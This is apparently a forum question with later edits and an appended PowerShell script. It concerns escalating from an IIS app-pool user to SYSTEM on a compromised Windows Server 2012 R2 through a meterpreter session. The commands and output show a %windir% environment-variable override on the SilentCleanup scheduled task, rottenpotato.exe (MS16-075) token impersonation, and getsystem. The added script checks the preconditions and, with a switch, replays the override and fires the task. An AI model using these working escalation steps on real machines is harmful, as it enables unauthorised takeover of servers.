I am trying to escalate privileges from an IIS user on Windows Server 2012 R2 by exploiting environment variables in scheduled tasks for UAC bypass, as explained at the following link:

https://tyranidslair.blogspot.com/2017/05/exploiting-environment-variables-in.html

Short story: the article explains that, as CU, an attacker can override the path of an already scheduled task that has "RunLevel: Highest" (highest privileges) with another path.

Unfortunately for me:

meterpreter > shell
Process 11056 created.
Channel 26 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

d:\UploadFolder>reg add hkcu\Environment /v windir /d "cmd /K reg delete hkcu\Environment /v windir /f && REM "
reg add hkcu\Environment /v windir /d "cmd /K reg delete hkcu\Environment /v windir /f && REM "
ERROR: Access is denied.

d:\UploadFolder>

But:

d:\UploadFolder>schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
SUCCESS: Attempted to run the scheduled task "\Microsoft\Windows\DiskCleanup\SilentCleanup".

Is there a way to bypass the error "ERROR: Access is denied." for the HKCU?

Later Edit:

I was able to use rottenpotato.exe (exploit payload for MS16-075) in order to get NT AUTHORITY\SYSTEM on the system. So I can use a vulnerability from 2016, but I cannot use a vulnerability from 2017 because of that "ERROR: Access is denied.".

meterpreter > execute -f rottenpotato.exe -Hc
Process 6960 created.
Channel 1 created.
meterpreter >  list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
IIS APPPOOL\BOX

Impersonation Tokens Available
========================================
NT AUTHORITY\IUSR
NT AUTHORITY\SYSTEM

meterpreter > impersonate_token "NT AUTHORITY\\System"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[-] No delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Later Edit 2:

meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeIncreaseQuotaPrivilege
SeChangeNotifyPrivilege
SeImpersonatePrivilege
SeCreateGlobalPrivilege
SeIncreaseWorkingSetPrivilege

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeIncreaseQuotaPrivilege
SeChangeNotifyPrivilege
SeImpersonatePrivilege
SeCreateGlobalPrivilege
SeIncreaseWorkingSetPrivilege

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

I then tried exploiting environment variables in scheduled tasks for UAC bypass while running as NT AUTHORITY\SYSTEM; after a while (5 minutes) a new meterpreter shell popped up and:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getpr
getprivs  getproxy  
meterpreter > getprivs 

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeBackupPrivilege
SeRelabelPrivilege
SeChangeNotifyPrivilege
SeTcbPrivilege
SeCreateGlobalPrivilege
SeSystemEnvironmentPrivilege
SeCreatePagefilePrivilege
SeManageVolumePrivilege
SeCreatePermanentPrivilege
SeSecurityPrivilege
SeCreateSymbolicLinkPrivilege
SeSystemtimePrivilege
SeCreateTokenPrivilege
SeTrustedCredManAccessPrivilege
SeDebugPrivilege
SeProfileSingleProcessPrivilege
SeImpersonatePrivilege
SeRestorePrivilege
SeIncreaseBasePriorityPrivilege
SeShutdownPrivilege
SeIncreaseQuotaPrivilege
SeSystemProfilePrivilege
SeIncreaseWorkingSetPrivilege
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
SeTimeZonePrivilege
SeLockMemoryPrivilege
SeUndockPrivilege

meterpreter > 
Lucian Nitescu

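The following PowerShell script is an added example and is not part of the question above or of the linked article. It checks the preconditions the technique depends on before the override is attempted, so an "Access is denied" on HKCU\Environment can be diagnosed rather than just observed: which identity the shell runs as, whether a hive for that SID is loaded under HKEY_USERS, whether HKCU\Environment can actually be opened for writing and what its ACL says, and whether the target task really runs with RunLevel HighestAvailable and references %windir% in its command. The task name and the override payload are taken from the post; the -DoOverride switch is an assumption of this script and simply replays the post's two commands once the checks pass.

```powershell
# Added example, not from the original post. Assumes it is run from the
# low-privileged shell on the target; the task name is the one from the post.
param([switch]$DoOverride)

$TaskName = '\Microsoft\Windows\DiskCleanup\SilentCleanup'

# 1. Identity and profile state: HKCU is only meaningful if a hive for this
#    SID is loaded under HKEY_USERS.
$id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
"Running as: $($id.Name)"
$hive = "Registry::HKEY_USERS\$($id.User.Value)"
"HKEY_USERS hive loaded for this SID: $(Test-Path $hive)"

# 2. Try to open HKCU\Environment for writing instead of guessing from the ACL.
try {
    $k = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Environment', $true)
    if ($null -eq $k) {
        'HKCU\Environment does not exist for this identity'
        $writable = $false
    } else {
        'HKCU\Environment is writable'
        $k.Close()
        $writable = $true
    }
} catch [System.Security.SecurityException] {
    "HKCU\Environment is NOT writable: $($_.Exception.Message)"
    $writable = $false
}

# Show who is allowed what on the key, so a denial can be explained.
$acl = Get-Acl 'HKCU:\Environment' -ErrorAction SilentlyContinue
if ($acl) {
    $acl.Access | Format-Table IdentityReference, RegistryRights, AccessControlType -AutoSize
}

# 3. Confirm the task runs elevated and that its command is resolved via %windir%.
#    schtasks /XML prints the task definition; join the lines before parsing.
[xml]$task = (schtasks /Query /TN $TaskName /XML) -join "`n"
$runLevel = $task.Task.Principals.Principal.RunLevel
$command  = $task.Task.Actions.Exec.Command
$args     = $task.Task.Actions.Exec.Arguments
"RunLevel : $runLevel"
"Command  : $command $args"
$hijackable = ($runLevel -eq 'HighestAvailable') -and ($command -like '*%windir%*')
"Task uses %windir% and runs elevated: $hijackable"

# 4. Only when every precondition holds, replay the two commands from the post:
#    point %windir% at a cmd that removes the override again, then fire the task.
if ($DoOverride) {
    if (-not ($writable -and $hijackable)) {
        'Preconditions not met; not attempting the override.'
        return
    }
    reg add hkcu\Environment /v windir /d 'cmd /K reg delete hkcu\Environment /v windir /f && REM ' /f
    schtasks /Run /TN $TaskName /I
}
```

Run it without -DoOverride first; the interesting output is the combination of the hive-loaded flag and the OpenSubKey result. A SecurityException there, or a missing hive for the SID, tells you the override is failing before the scheduled task is ever involved, which is a different problem from the task not honouring the per-user %windir%.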